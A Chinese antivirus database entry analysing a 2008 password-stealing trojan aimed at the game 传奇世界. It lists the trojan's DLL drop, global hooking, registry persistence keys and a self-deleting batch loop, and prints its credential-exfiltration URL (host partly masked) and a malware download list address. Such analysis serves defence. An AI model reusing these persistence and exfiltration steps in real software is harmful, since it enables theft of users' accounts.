WEB开发网
开发学院网络安全病毒数据库 Win32.Troj.Lmir.be.22183 阅读

Win32.Troj.Lmir.be.22183

 2008-08-11 20:25:04 来源:WEB开发网   
核心提示:病毒名称(中文):传奇世界盗号木马22183病毒别名:威胁级别:★☆☆☆☆病毒类型:偷密码的木马病毒长度:22183影响系统:Win9xWinMeWinNTWin2000WinXPWin2003病毒行为:这是一个网游盗号木马,它的目标是《传奇世界》的帐号密码信息,Win32.Troj.Lmir.be.22183,同时,
病毒名称(中文): 传奇世界盗号木马22183
病毒别名:
威胁级别: ★☆☆☆☆
病毒类型: 偷密码的木马
病毒长度: 22183
影响系统: Win9xWinMeWinNTWin2000WinXPWin2003



病毒行为:

这是一个网游盗号木马。它的目标是《传奇世界》的帐号密码信息。同时,它还会下载一些恶意程序到用户电脑中执行。

病毒流程:
1读取文件尾部104个字节

2删除文件
\FileName=C:\PRogramFiles\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll

3从自身查找名为“DLLFILE”的资源,加载并释放到
C:\ProgramFiles\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll
然后再把刚才得到的104个资源写入新文件SysWFGCQSJ2.dll的尾部。

4加载该DLL,GetProcaddress得到该DLL的两个导出函数jmpHookOnjmpHookOff
调用jmpHookOn,该函数的作用是下全局钩子,使所有进程加载该DLL。

5注册CLSID组件
HKCR\CLSID\{DC7035B1-E435-4A65-9546-059796785F52}\InProcServer32
"(Default)"="%ProgramFiles%\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll"

6添加启动项,随系统进程启动
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{DC7035B1-E435-4A65-9546-059796785F52}

7生成bat文件删除原始程序
:try
del"D:\software\RunPE\virus.exe"
ifexist"D:\software\RunPE\virus.exe"gototry
del%0

病毒所释放的SysWFGCQSJ2.dll文件的作用
DLL被加载后
1,判定当前进程是否是桌面进程,若是跳到2.

2,移动文件MoveFileExA
0006F3E800930128|ExistingName="C:\WINDOWS\system32\VerCLSID.exe"
0006F3EC00930158|NewName="C:\WINDOWS\system32\VerCLSID.bak"

3查找窗口FindWindow,若没查找,则创建一个新线程
0006F604003F6AD4|Class="ListBox"
0006F608003F6AC8\Title="dll_wfgCQSJ"
该线程的作用是:
1查找窗口|Class="ListBox"\Title="dll_wfgCQSJ",若没找到,则创建一个新窗口

2加载DLLC:\ProgramFiles\CommonFiles\MicrosoftShared\MSINFO\SysWFGCQSJ2.dll

3查找窗口/Title="ZXY_wfgCQSJ"|Class="ListBox",判定该窗口是否存在,若存在则发送WM_QUITE消息

4SetWindowsHookExA设置WH_GETMESSAGE钩子,钩子回调函数的作用是:
获取用户传奇世界账号并以一下形式发送到网络
http://ftp.y***9.com/px/login.aspgameid=&passWord=&quyu=&mirserver=&js1=
&js1zy=&js1dj=&js1sex=
&js2=&js2zy=&js2dj=&js2sex=&zb=<<传奇世界>>附加信息

5设置计时器,计时器回调函数的作用是,从网上下载恶意程序并执行。
恶意网址列表http://www.6***11.cn/txt/url.txt







Tags:Win Troj Lmir

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接